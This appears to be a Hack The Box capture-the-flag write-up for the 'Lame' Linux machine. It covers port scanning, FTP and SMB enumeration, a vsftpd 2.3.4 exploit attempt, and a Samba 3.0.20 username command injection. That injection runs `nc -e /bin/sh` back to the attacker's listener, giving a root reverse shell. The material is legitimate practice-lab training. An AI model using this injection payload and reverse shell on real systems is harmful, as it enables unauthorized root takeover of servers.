🖥️
Cybersecurity
  • 👋Welcome Page
    • About Me
  • 🗒️Progress List
  • ⌨️Cybersecurity
    • Tip & Tricks
      • Add Host
      • Bash Upgrade
      • Custom Function
      • Docker Container
      • Nuclei
  • 🖥️Hack The Box
    • Linux Machine
      • Easy Machine
        • Shocker
    • Windows Machine
      • Easy Machine
        • Active
    • Old Machines
      • Easy Machine
        • Academy
        • Bashed
        • Bastion
        • Cap
        • Explore
        • Forest
        • Friendzone
        • Haystack
        • Help
        • Irked
        • Lame
        • Mirai
        • Networked
        • OpenAdmin
        • Photobomb
        • Precious
        • MonitorsTwo
        • Sau
        • Topology
      • Medium Machine
        • Aragog
        • Bitlab
        • Canape
        • DevOops
        • Forgot
        • Jarvis
        • Lightweight
        • Magic
        • Tenten
      • Hard Machine
        • Spider
        • Zipper
    • Current Season
      • Headless
      • Perfection
  • 📙BurpSuite Labs
    • 🔬Laboratories
      • Code Template Page
      • HTTP Host Header Attacks
Powered by GitBook
On this page
  • Gather Information
  • Exploitation
  1. Hack The Box
  2. Old Machines
  3. Easy Machine

Lame

#Linux #Enumeration #FTP #SMB

PreviousIrkedNextMirai

Last updated 8 months ago

Lame is an easy-rated Linux machine from created by ch4p. This machine has no mystery, which is suitable for practice. In this case, you find something and search for that exploit. In the current post, my IP is 10.10.14.49, and the target’s IP is 10.129.223.149

Gather Information

Local Terminal
nmap -p- --open -T5 -v -n 10.129.223.149 -oG AllPorts
Local Terminal
nmap -sCV -p 21,22,139,445,3632 10.129.223.149 -oN Target

Port 21 Anonymous allowed and the version is included, vsFTPd 2.3.4, perfect, we will search about that. And the port 139 is another SMB but from a different workgroup.

Local Terminal
ftp 10.129.223.149			# user : anonymous , pass : anonymous
Local Terminal
crackmapexec smb 10.129.223.149
smbmap -H 10.129.223.149
Local Terminal
smbclient -L 10.129.223.149 -N
Local Terminal
smbclient //10.129.223.129/tmp -N

And we can’t login with null?

Exploitation

At this point we have the following information, an Port 21 FTP vsFTPd 2.3.4, Port 139 SMB (unknown version) and Port 445 SMB (3.0.20)

  • Search: vsFTPd 2.3.4 exploit

Local Terminal
git clone https://github.com/ahervias77/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
batcat vsftpd_234_exploit.py
Local Terminal
python3 vsftpd_234_exploit.py 10.129.223.149 21 whoami
Local Terminal
batcat 16320.rb
Local Terminal [A]
nc - nlvp 443
Local Terminal [B]
smbclient //10.129.223.149/tmp -N --option='client min protocol=NT1'
logon "/=`nohup nc -e /bin/sh 10.10.14.49 443 `"

As you can see, we are connected as root, so we can get both flags directly.

Target Terminal [Root]
script /dev/null -c bash
cat /home/makis/user.txt
cat /root/root.txt

At search for Samba 3.0.20 (Windows issue), and download the exploit from

🖥️
https://www.exploit-db.com/
https://www.exploit-db.com/exploits/16320
HackTheBox
From here, we have FTP, SMB and NetBios Session Service, nothing about a website.
Hey, there is nothing inside!
Look! There is an entrance at tmp, we should use that.
Fail, but this is a client-side error.
So, those are the instruction.
It doesn’t works, let’s try with other way
The exploit only connects to SMB and use a long string as username, and we know that the SMB has an unknown version.
As we can see, the payload is a terminal command, maybe we can change that part to create a reverse shell.
Now your TermA is target root [Root]